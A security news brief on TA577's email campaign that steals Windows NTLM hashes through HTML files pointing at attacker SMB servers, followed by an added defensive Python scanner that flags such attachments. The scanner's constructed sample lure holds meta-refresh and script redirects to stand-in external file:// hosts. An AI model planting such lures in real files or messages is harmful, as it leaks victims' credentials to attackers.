
Windows NTLM hashes targeted in novel IAB attacks

Hundreds of organizations have been targeted over the past week by initial access broker TA577, also known as Hive0118, in attacks aimed at stealing Windows NT LAN Manager (NTLM) authentication data, reports CSO Online.

The malicious emails, which TA577 injects into existing legitimate message threads (thread hijacking), carry a password-protected ZIP archive containing an HTML document. When the HTML file is opened, it references an attacker-controlled SMB server through a file-scheme URI, and Windows attempts to authenticate to that server, handing the attacker the victim's NTLM challenge-response data, according to a report from Proofpoint. The servers were observed running the open-source Impacket toolkit to capture the NTLM hashes, which could later be used in NTLM relay attacks, said researchers, who recommended blocking outbound SMB connections to untrusted networks to mitigate the risk. "If the file scheme URI was sent directly in the email body, the attack would not work on Outlook mail clients patched since July 2023. Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access," researchers added.
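As an added example (not code from Proofpoint, SC Media, or the TA577 campaign itself), the following Python scanner shows the kind of attachment check a mail gateway or sandbox can run on an HTML file: it collects every reference a browser would dereference (meta refresh targets, src/href attributes, and file-scheme or UNC strings inside inline script) and flags those that would make Windows open an SMB session to a host outside the organization. The sample HTML is constructed for the example and does not reproduce the actual lure; the `.corp.example` internal suffix is a placeholder assumption, and the "single-label hostnames are internal" rule is a heuristic, not a guarantee.

```python
"""Flag HTML attachments that would coerce an outbound SMB authentication.

Added example, not the original page's code. SAMPLE_LURE is constructed.
"""
import ipaddress
import re
from html.parser import HTMLParser

# Attributes browsers dereference automatically (src, data, poster) or on click.
_URL_ATTRS = ("src", "href", "data", "action", "poster")
# Target of <meta http-equiv="refresh" content="0; url=...">.
_META_REFRESH = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)
# file:// URIs or raw UNC paths appearing in text nodes such as inline <script>.
_TEXT_REF = re.compile(r"(?:file:[\\/]{2,}|\\\\)[^\s'\"<>]+", re.IGNORECASE)


class _RefCollector(HTMLParser):
    """Gather every candidate URL/UNC reference in document order."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_REFRESH.search(a.get("content") or "")
            if m:
                self.refs.append(m.group(1))
        for k in _URL_ATTRS:
            if a.get(k):
                self.refs.append(a[k])

    def handle_data(self, data):
        # Script/style bodies reach us as raw text; catch file:// and \\host\share there.
        self.refs.extend(_TEXT_REF.findall(data))


def smb_target(ref):
    """Return the host a reference would contact over SMB, or None if it is local.

    Handles file://host/share, file:\\\\host\\share and bare \\\\host\\share forms.
    file:///C:/... has an empty host and is a local path, so it returns None.
    """
    s = ref.strip()
    if s.lower().startswith("file:"):
        s = s[5:]
    s = s.replace("\\", "/")
    if not s.startswith("//"):
        return None
    host = s[2:].split("/", 1)[0]
    host = host.split("@")[-1].split(":")[0]  # drop userinfo and port
    return host or None


def is_external(host, internal_suffixes=(".corp.example",)):
    """Heuristic: private/loopback IPs, localhost, single-label names and the
    organisation's own DNS suffixes are internal; everything else is external.
    internal_suffixes is a placeholder assumption for the example."""
    h = host.lower()
    if h == "localhost" or "." not in h:
        return False
    try:
        ip = ipaddress.ip_address(h)
        return not (ip.is_private or ip.is_loopback or ip.is_link_local)
    except ValueError:
        return not h.endswith(tuple(s.lower() for s in internal_suffixes))


def scan_html(html, internal_suffixes=(".corp.example",)):
    """Return [(host, reference), ...] for references that would leak NTLM to an external SMB server."""
    p = _RefCollector()
    p.feed(html)
    p.close()
    findings = []
    for ref in p.refs:
        host = smb_target(ref)
        if host and is_external(host, internal_suffixes):
            findings.append((host, ref))
    return findings


# Constructed sample: one meta-refresh lure, one internal UNC image, one local
# file:/// link, and a file:// redirect buried in script.
SAMPLE_LURE = """<!doctype html><html><head>
<meta http-equiv="refresh" content="0; url=file://share.example.net/docs/invoice.txt">
</head><body>
<img src="\\\\10.0.0.5\\public\\logo.png">
<a href="file:///C:/Users/Public/readme.txt">local copy</a>
<script>location.href = "file://files.example.org/drop/";</script>
</body></html>"""

if __name__ == "__main__":
    for host, ref in scan_html(SAMPLE_LURE):
        print(f"external SMB coercion: host={host} ref={ref}")
```

The check deliberately ignores references to private address space and internal DNS suffixes so that legitimate intranet links do not fire; it is an attachment-layer complement to the network-level control the researchers recommend, since the quoted caveat still holds: once such a file is opened on a host that can reach TCP 445 on the internet, the authentication attempt happens regardless of guest-access settings.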
